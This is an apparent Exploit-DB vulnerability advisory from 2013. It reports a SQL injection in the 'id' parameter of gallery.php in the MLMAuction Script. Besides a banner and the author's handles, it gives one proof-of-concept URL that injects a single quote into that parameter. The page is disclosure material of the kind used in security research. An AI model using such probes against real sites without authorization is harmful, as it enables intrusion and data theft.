MLMAuction Script (gallery.php, id param) - SQL Injection



EDB-ID: 27518 CVE: N/A OSVDB-ID: 96106
Author: 3spi0n Published: 2013-08-12 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
##################################################################################
  _____                 _       _   _                _____           
 |  __ \               | |     | | (_)              / ____|          
 | |__) |_____   _____ | |_   _| |_ _  ___  _ __   | (___   ___  ___ 
 |  _  // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \   \___ \ / _ \/ __|
 | | \ \  __/\ V / (_) | | |_| | |_| | (_) | | | |  ____) |  __/ (__ 
 |_|  \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___|
                                                                                                                                        
##################################################################################																
MLMAuction Script, SQL Injection Vulnerabilities
Product Page: http://www.auctionwebsitescript.com/mlm_auction.html

Author(Pentester): 3spi0n
On Web: RevolutionSec.Com - GraySecure.Org
On Social: Twitter.Com/eyyamgudeer
##################################################################################

[1] SQL Injection Vulnerability on Demo Site

[+] (gallery.php, id Param)
>>> http://server/gallery.php?id='1